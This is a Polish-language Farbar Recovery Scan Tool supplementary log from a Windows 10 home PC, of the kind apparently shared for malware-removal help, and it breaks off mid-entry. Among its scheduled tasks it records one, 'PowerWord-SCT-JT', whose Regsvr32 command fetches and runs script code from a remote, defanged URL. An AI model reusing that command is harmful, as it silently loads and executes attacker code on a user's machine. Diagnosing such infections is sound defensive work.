Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 27-04-2017 Uruchomiony przez Toshiba (30-04-2017 14:14:48) Uruchomiony z C:\Users\Toshiba\Desktop\Programy Windows 10 Home Wersja 1607 (X64) (2016-09-23 07:04:15) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2717061265-649508285-3199829881-500 - Administrator - Disabled) Gość (S-1-5-21-2717061265-649508285-3199829881-501 - Limited - Disabled) Konto domyślne (S-1-5-21-2717061265-649508285-3199829881-503 - Limited - Disabled) Toshiba (S-1-5-21-2717061265-649508285-3199829881-1001 - Administrator - Enabled) => C:\Users\Toshiba ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated) AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1332, 21.12.2013 - AIMP DevTeam) CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform) cgoban (HKLM-x32\...\{org.igoweb.cgoban}}_is1) (Version: 1.1 - Unknown) GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation) IQ Option (HKLM-x32\...\IQ Option) (Version: 1.0 - IQOption) K-Lite Codec Pack 11.9.6 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.9.6 - KLCP) LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.558 - LogMeIn, Inc.) LogMeIn Hamachi (x32 Version: 2.2.0.558 - LogMeIn, Inc.) Hidden Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24516 (HKLM-x32\...\{c325004c-5538-45b3-a7ad-94473a4dcd3b}) (Version: 14.0.24516.0 - Microsoft Corporation) MTA:SA v1.5.3 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.3 - Multi Theft Auto) Mumble 1.2.17 (HKLM-x32\...\{272103F4-ACBB-4D6A-A320-FC5C15492997}) (Version: 1.2.17 - Thorvald Natvig) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Railroad Tycoon 3 (HKLM-x32\...\{DE29025A-091F-4998-AD2D-24C84421190F}) (Version: 1.0 - ) Real Alternative 1.9.0 (HKLM-x32\...\RealAlt_is1) (Version: 1.9.0 - ) Real War Rogue States (HKLM-x32\...\{1EF75089-392B-4771-B791-17316E27EBA6}) (Version: 2.00.000 - ) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH) The Many Faces of Go (HKLM-x32\...\{172A8E1E-E924-4AFB-98A9-AC93822D4C9D}) (Version: 12.023 - Smart Games) Unity Web Player (HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS) Warcraft III Deluxe (HKLM-x32\...\Warcraft III Deluxe - Respev edition_is1) (Version: - Respev) WinRAR 5.31 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) World of Tanks (HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) World of Warships (HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C814eu}_is1) (Version: - Wargaming.net) XVM wersja 6.3.2 (HKLM-x32\...\{2865cd27-6b8b-4413-8272-cd968f316050}_is1) (Version: 6.3.2 - XVM team) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {1C4C77C9-1292-4908-8435-57EA5763DEFD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== scrobj.dll Task: {4137FC9A-32A2-43AB-8567-0F1CEBBF6B66} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-27] (Google Inc.) Task: {63AE0A27-6316-4D63-90F0-52C54170E299} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-27] (Google Inc.) Task: {6B2171AC-C595-449F-AFF3-EF1C915577F4} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd) Task: {7DCAC208-A783-41C6-885C-0E224D0E18F4} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Toshiba\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe Task: {902C2147-5CDB-469B-AB63-D52D8ABC8E20} - System32\Tasks\avast! Windows 10 Start Menu helper => c:\program files\avast software\avast\asww10mon.exe Task: {92BD9555-1D23-44EF-B0D0-0FB20F52F1F1} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2017-04-12] (Microsoft Corporation) Task: {A1B06003-2042-43B8-8D47-CD6588CE1CDF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {AB823A3E-A501-4F37-B95B-74B1B25B7357} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-19] (Adobe Systems Incorporated) Task: {DB7AC0C8-FC49-4A8B-913B-9F04814ACEBB} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {E6BA7B92-E160-4764-B9BE-B4B395375CA0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated) Task: {F33884D7-3C72-429E-8AAA-BFE43697E6EB} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {FECBCFE3-DCDB-4E51-BB65-F2679E4478C2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Toshiba\Desktop\Gry\DSJ — skrót .lnk -> C:\Program Files (x86)\DOSBox-0.74\DSJ.bat () ==================== Załadowane moduły (filtrowane) ============== 2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2017-04-12 09:28 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2017-04-12 09:28 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-09-23 09:51 - 2016-09-23 09:51 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2017-03-15 21:48 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2017-03-15 21:49 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-03-15 21:49 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-03-15 21:49 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2017-04-12 09:28 - 2017-03-28 07:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2017-04-12 09:28 - 2017-03-28 07:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2015-06-01 22:00 - 2017-03-09 02:16 - 00112264 _____ () C:\Windows\System32\IccLibDll_x64.dll 2017-04-26 17:45 - 2017-04-26 17:45 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.14.662.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-04-26 17:45 - 2017-04-26 17:45 - 00190464 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.14.662.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-04-26 17:45 - 2017-04-26 17:45 - 43011072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.14.662.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-04-26 17:45 - 2017-04-26 17:45 - 02451456 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.14.662.0_x64__kzf8qxf38zg5c\skypert.dll 2017-03-31 21:14 - 2017-04-01 13:07 - 00019456 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe 2017-03-31 21:14 - 2017-04-01 13:07 - 22723584 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll 2017-03-31 21:14 - 2017-04-01 13:07 - 00448512 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.AGM.Native.Windows.dll 2017-03-31 21:14 - 2017-04-01 13:07 - 05427200 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\MediaEngine.dll 2016-06-05 09:21 - 2016-06-05 09:22 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll 2017-03-31 21:14 - 2017-04-01 13:07 - 00435712 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll 2017-03-31 21:14 - 2017-04-01 13:07 - 01062400 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Sharing.dll 2016-03-04 10:21 - 2016-03-04 10:21 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll 2017-03-29 08:39 - 2017-03-29 08:39 - 01668976 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17022.10311.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData:NT [40] AlternateDataStreams: C:\ProgramData:NT2 [432] AlternateDataStreams: C:\Users\All Users:NT [40] AlternateDataStreams: C:\Users\All Users:NT2 [432] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432] AlternateDataStreams: C:\Users\Toshiba\Dane aplikacji:NT [40] AlternateDataStreams: C:\Users\Toshiba\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\Users\Toshiba\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Toshiba\AppData\Roaming:NT2 [432] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2015-10-30 09:24 - 2015-10-30 09:21 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2717061265-649508285-3199829881-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Toshiba\Desktop\d2b89c2f-3d57-4385-b9e2-307c346b748a.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == HKLM\...\StartupApproved\Run: => "PWRISOVM.EXE" HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\StartupApproved\Run: => "OneDrive" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [UDP Query User{0A63A22D-44E8-492E-8818-243EE7019040}C:\program files (x86)\gp bikes\core.exe] => (Block) C:\program files (x86)\gp bikes\core.exe FirewallRules: [TCP Query User{8F4916ED-D568-423D-8E51-D5B74BB9817C}C:\program files (x86)\gp bikes\core.exe] => (Block) C:\program files (x86)\gp bikes\core.exe FirewallRules: [{27920E71-F919-4888-8A44-ECCE84B11808}] => (Allow) C:\Games\World_of_Warships\worldofwarships.exe FirewallRules: [{76D79B41-193F-42FC-B7B1-4EC0504E5265}] => (Allow) C:\Games\World_of_Warships\worldofwarships.exe FirewallRules: [{8792C6A6-C87D-4548-B5B8-A273496FBC6E}] => (Allow) C:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{74AF548E-C155-4449-B129-B41CBE7DC255}] => (Allow) C:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [UDP Query User{19ED5263-41BF-4A04-A005-1F2C5D01BA39}C:\program files (x86)\warcraft iii deluxe\war3.exe] => (Block) C:\program files (x86)\warcraft iii deluxe\war3.exe FirewallRules: [TCP Query User{D2EE1248-6E11-4BA0-BE21-C4580060BBF0}C:\program files (x86)\warcraft iii deluxe\war3.exe] => (Block) C:\program files (x86)\warcraft iii deluxe\war3.exe FirewallRules: [{944FDBFB-0F1A-4139-8AFF-5FF1E810C97F}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe FirewallRules: [{3538BCD4-B55F-406C-B5D3-C9ADF5176C0A}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe FirewallRules: [{7C4F0FC5-D60F-41F6-BEDC-7EE168A67EE9}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe FirewallRules: [{9386D5F5-8401-443A-B2E0-8C2FDD1BE908}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe FirewallRules: [TCP Query User{43A1FA62-23C8-47FA-A7CC-085DCDD36A5A}C:\program files (x86)\oil tycoon\ot.exe] => (Block) C:\program files (x86)\oil tycoon\ot.exe FirewallRules: [UDP Query User{51B9FDF1-D1C8-4B53-92C1-3DAEBB1A2FA9}C:\program files (x86)\oil tycoon\ot.exe] => (Block) C:\program files (x86)\oil tycoon\ot.exe FirewallRules: [TCP Query User{364E3DC4-1249-419E-BC15-76ADC0785B11}G:\ot.exe] => (Allow) G:\ot.exe FirewallRules: [UDP Query User{2CCE0438-6F0C-4ADA-BD30-C701C8CFBB8D}G:\ot.exe] => (Allow) G:\ot.exe FirewallRules: [TCP Query User{F3C0869F-F398-4145-A337-7D894570F8E7}C:\program files (x86)\railroad tycoon 3\rt3.exe] => (Block) C:\program files (x86)\railroad tycoon 3\rt3.exe FirewallRules: [UDP Query User{17EFDAD7-53D8-4FED-969F-DE38031FBF85}C:\program files (x86)\railroad tycoon 3\rt3.exe] => (Block) C:\program files (x86)\railroad tycoon 3\rt3.exe FirewallRules: [TCP Query User{A120A5DE-0B28-4BC4-BC82-6522E1EF93E1}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe FirewallRules: [UDP Query User{2B8F922D-5667-43D3-B347-BDA8A44F69E6}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe FirewallRules: [TCP Query User{75D85471-E91A-428E-BC82-1E930421E876}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [UDP Query User{638696D6-19AC-47F9-A45C-61B640EB6615}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe FirewallRules: [TCP Query User{116BFC6A-74E4-4580-949E-2EEC60D46ACF}C:\program files (x86)\simon and schuster\real war rogue states\rwx.exe] => (Allow) C:\program files (x86)\simon and schuster\real war rogue states\rwx.exe FirewallRules: [UDP Query User{D990C1DD-8B6D-4752-9BCF-D916933C2B2F}C:\program files (x86)\simon and schuster\real war rogue states\rwx.exe] => (Allow) C:\program files (x86)\simon and schuster\real war rogue states\rwx.exe FirewallRules: [TCP Query User{67E91C23-5D38-4698-8B67-79F771CE8D95}C:\program files (x86)\virgin interactive\original war\owarfull.dll] => (Block) C:\program files (x86)\virgin interactive\original war\owarfull.dll FirewallRules: [UDP Query User{98C3AFB0-4287-4741-830B-87FCAED9CE12}C:\program files (x86)\virgin interactive\original war\owarfull.dll] => (Block) C:\program files (x86)\virgin interactive\original war\owarfull.dll FirewallRules: [TCP Query User{BDBEF3D5-23F4-4D94-8C95-BF56CCC01DB5}C:\users\toshiba\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\toshiba\appdata\roaming\gameranger\gameranger\gameranger.exe FirewallRules: [UDP Query User{B645C0C9-77B4-417B-8D59-C5D9FB9EC1AB}C:\users\toshiba\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\toshiba\appdata\roaming\gameranger\gameranger\gameranger.exe FirewallRules: [TCP Query User{C42A3050-80EE-40C7-A870-2BF395FD3C94}C:\gog games\stronghold hd\stronghold.exe] => (Block) C:\gog games\stronghold hd\stronghold.exe FirewallRules: [UDP Query User{CC147A4C-66AE-40B5-904F-A916B66D8BA3}C:\gog games\stronghold hd\stronghold.exe] => (Block) C:\gog games\stronghold hd\stronghold.exe FirewallRules: [TCP Query User{B968B32D-AA32-4AC2-8FE9-3AC0B59D6D9C}C:\program files (x86)\simon and schuster\real war rogue states\rsclient.exe] => (Allow) C:\program files (x86)\simon and schuster\real war rogue states\rsclient.exe FirewallRules: [UDP Query User{00EFF590-34C2-4894-B296-DE9EAD20DB4C}C:\program files (x86)\simon and schuster\real war rogue states\rsclient.exe] => (Allow) C:\program files (x86)\simon and schuster\real war rogue states\rsclient.exe FirewallRules: [{64CD1428-CC41-498A-9708-068AD6B42DFD}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Punkty Przywracania systemu ========================= 23-04-2017 12:13:12 Windows Update 30-04-2017 13:36:32 SPTD setup V2.12 ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: LogMeIn Hamachi Virtual Ethernet Adapter Description: LogMeIn Hamachi Virtual Ethernet Adapter Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: LogMeIn Inc. Service: Hamachi Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (04/30/2017 01:36:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddLegacyDriverFiles: Unable to back up image of binary SCDEmu. System Error: Nie można odnaleźć określonego pliku. . Error: (04/30/2017 01:36:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddLegacyDriverFiles: Unable to back up image of binary Protokół LLDP (Link-Layer Discovery Protocol) firmy Microsoft. System Error: Odmowa dostępu. . Error: (04/30/2017 01:36:32 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas badania interfejsu IVssWriterCallback. hr = 0x80070005, Odmowa dostępu. . To jest często spowodowane przez niepoprawne ustawienia zabezpieczeń w procesie zapisującym lub żądającym. Operacja: Zbieranie danych modułu zapisującego Kontekst: Identyfikator klasy modułu zapisującego: {e8132975-6f93-4464-a53e-1050253ae220} Nazwa modułu zapisującego: System Writer Identyfikator wystąpienia modułu zapisującego: {4fd56279-7089-431c-b88a-eda0eea64be9} Error: (04/26/2017 09:39:20 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu. Error: (04/25/2017 01:01:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-QR2OCMA) Description: Aktywacja aplikacji Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (04/24/2017 08:01:06 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu. Error: (04/23/2017 06:29:55 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-QR2OCMA) Description: Aktywacja aplikacji Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (04/23/2017 06:29:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-QR2OCMA) Description: Aktywacja aplikacji Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (04/23/2017 06:25:51 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu. Error: (04/23/2017 12:13:17 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Przetwarzanie wywołania OnIdentity() w obiekcie System Writer przez Usługi kryptograficzne nie powiodło się. Details: AddLegacyDriverFiles: Unable to back up image of binary Protokół LLDP (Link-Layer Discovery Protocol) firmy Microsoft. System Error: Odmowa dostępu. . Dziennik System: ============= Error: (04/30/2017 01:42:47 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} i identyfikatorem aplikacji APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/30/2017 01:42:24 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x8024001e: Aktualizacja definicji dla: Windows Defender — KB2267602 (Definicja 1.241.806.0). Error: (04/30/2017 01:42:22 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/30/2017 01:41:13 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} i identyfikatorem aplikacji APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/30/2017 01:40:44 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QR2OCMA) Description: Serwer {9BA05972-F6A8-11CF-A442-00A0C90A8F39} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (04/30/2017 01:40:43 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest 